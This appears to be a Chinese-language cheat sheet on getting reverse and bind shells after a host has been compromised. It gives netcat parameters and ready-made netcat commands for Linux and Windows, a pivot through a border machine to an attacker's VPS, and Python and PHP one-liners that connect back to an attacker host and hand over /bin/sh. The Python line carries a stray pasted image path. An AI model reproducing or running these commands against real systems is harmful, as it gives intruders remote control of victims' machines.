🔥码云GVP开源项目 12k star Uniapp+ElementUI 功能强大 支持多语言、二开方便! 广告
[TOC] ## 常用的反弹工具 * nc windows系统需要上传nc的工具 * python 需要目标机安装了python环境,一般linux系统自带,windows不会自带,其实也就是执行python脚本代码,从而脚本连接到攻击机 * bash PHP反弹shell,跟python一样,都需要一定的环境,实际上都是运用PHP去执行脚本,从而脚本连接到攻击机 ## 反弹Shell——NetCat * Netcat有着“网络工具中的瑞士军刀”的绰号它体积小巧,功能却又十分强大netcat,它使用TCP或UDP协议在网络连接上读取和写入数据,它被设计成一个可靠的“后端”工具,可以是直接或容易被其他程序和脚本所驱动 * 前提条件:代理还是端口转发的前提是该台设备已经拿下基本的权限,能够上传工具和执行工具 ## NC常见参数 ~~~ -c 指定连接后要执行的shell命令 -e 指定连接后要执行的文件名 -l 监听模式 -p 设置本地使用的通信端口 -u 使用UDP传输协议,默认为TCP -V 显示命令执行过程,使用-vv显示更详细信息 ~~~ ## NC——正向Shell(Linux) ~~~ Linux • 靶机:nc -lvp 8888 -e /bin/bash • 攻击机:nc 192.168.7.148 8888 win • 靶机:nc.exe -lvp 8888 -e cmd.exe • 攻击机:nc.exe 192.168.7.147 8888 ~~~ ## NC——反向Shell ~~~ Linux • 靶机:nc 192.168.7.146 8888 -e /bin/bash • 攻击机:nc -lvp 8888 win • 靶机:nc.exe 192.168.7.144 80 -e cmd.exe • 攻击机:nc.exe -lvp 80 ~~~ ## NC——通过跳板机反弹shell 通过边界机作为跳板,将内网shell反弹到攻击者的vps上 ~~~ Linux • 靶机: nc.exe -lvp 6666 -e cmd.exe • 攻击机:nc -lvp 8888 • 边界机:nc -nv 192.168.7.146 8888 -c "nc 192.168.11.12 6666" win • 靶机: nc.exe -lvp 6666 -e cmd.exe • 攻击机:nc.exe -lvp 8888 • 边界机:nc.exe -v 192.168.7.144 8888 -e "nc.exe 192.168.11.12 6666" ~~~ ## Python命令反弹 将shell反弹到攻击者的vps上 ~~~ • 攻击机:nc.exe -lvp 8888 • 目标机: python -c 'import socket,subprocess,os; s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("![](file:///C:\Users\Administrator\AppData\Roaming\Tencent\QQTempSys\%W@GJ$ACOF(TYDYECOKVDYB.png)攻击机的IP",8888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);                os.dup2(s.fileno(),2);                p=subprocess.call(\["/bin/sh","-i"\]);' ~~~ ## PHP反弹Shell ``` 攻击机:nc -lvp 8888 靶机:php -r '$sock=fsockopen("192.168.7.146",8888);exec("/bin/sh -i <&3\>&3 2>&3");' ```